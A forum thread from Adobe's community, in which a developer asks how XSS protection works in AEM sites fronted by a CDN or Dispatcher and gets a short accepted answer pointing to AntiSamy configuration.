Expand my Community achievements bar.

SOLVED

Cross Site Scripting (XSS) related doubt in AEM

Avatar

Level 8

Hi,

I have a very limited/no knowledge on XSS protection in AEM.

Went through the links 

http://tostring.me/270/how-to-prevent-cross-site-scripting-xss-attack-on-your-adobe-cq-based-web-app...

https://docs.adobe.com/content/docs/en/cq/5-6-1/deploying/security_checklist.html#Protect%20against%...

My doubt is 

1] In most of the cases we will have CDN/Dispatcher front-ending the AEM websites. So, how is it that some malicious code injected on the user-facing[lets say website having CDN] page, can be handled at AEM level. Failing to understand this.

2] Also, went through the OOTB config file /libs/cq/xssprotection/config.xml, But could not understand much.

If you can point to any references articles /links explaining the same, it would be helpful.

1 Accepted Solution

Avatar

Correct answer by
Level 9
  1. XSS comes into picture if you storing something in your database or fiesystem.  Example forms page where user can input data at time of registration etc... and you are storing it.  CDN/Dispatcher can filter other attacks like DDOS the incoming traffic flooding into your system & also it is not meant to validate the user supplied data in general.  
  2.  You need to be familiar with xml,xsd and AntiSamy to understand the details.   https://www.owasp.org/index.php/AntiSamy_Directives

Thanks,

View solution in original post

2 Replies

Avatar

Correct answer by
Level 9
  1. XSS comes into picture if you storing something in your database or fiesystem.  Example forms page where user can input data at time of registration etc... and you are storing it.  CDN/Dispatcher can filter other attacks like DDOS the incoming traffic flooding into your system & also it is not meant to validate the user supplied data in general.  
  2.  You need to be familiar with xml,xsd and AntiSamy to understand the details.   https://www.owasp.org/index.php/AntiSamy_Directives

Thanks,

Avatar

Level 8

Hi,

Thank you for your reply.

In case, we have an AEM site, which does not accept any sort of input from users and just renders content, we need not worry about the XSS configuration thing, correct?